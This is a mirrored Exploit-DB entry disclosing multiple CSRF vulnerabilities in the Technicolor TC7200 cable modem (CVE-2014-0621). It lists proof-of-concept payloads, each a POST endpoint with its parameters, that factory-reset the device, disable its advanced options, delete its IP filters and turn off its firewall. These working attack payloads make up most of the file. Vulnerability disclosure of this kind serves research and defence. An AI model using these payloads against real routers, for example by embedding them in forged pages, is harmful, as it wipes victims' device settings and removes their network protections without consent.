exploit-db-mirror/platforms/hardware/webapps/30667.txt
Offensive Security 30d9cc4c3d Updated 01_04_2014
2014-01-04 23:27:58 +00:00

36 lines
No EOL
999 B
Text
Executable file

# Exploit Title: Technicolor TC7200 - Multiple CSRF Vulnerabilities
# Google Dork: N/A
# Date: 02-01-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage:
http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew
ays/cable-modems-gateways/tc7200-tc7300
# Software Link: N/A
# Version: STD6.01.12
# Tested on: N/A
# CVE : CVE-2014-0621
#
# Proof of Concept:
#
#
## Payload for Factory Reset:
#
# POST : http://<ip>/goform/system/factory
# Parameter: None
#
## Payload to disable the advanced options:
#
# POST : http://<ip>/goform/advanced/options
# Parameter: None
#
## Payload to remove ip-filters:
#
# POST : http://<ip>//goform/advanced/ip-filters
# Parameter: IpFilterAddressDelete1 = 1
#
## Payload to remove firewall settings
#
# POST : http://<ip>/goform/advanced/firewall
# Parameter: cbFirewall = 1
#
# Check out the video at: http://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/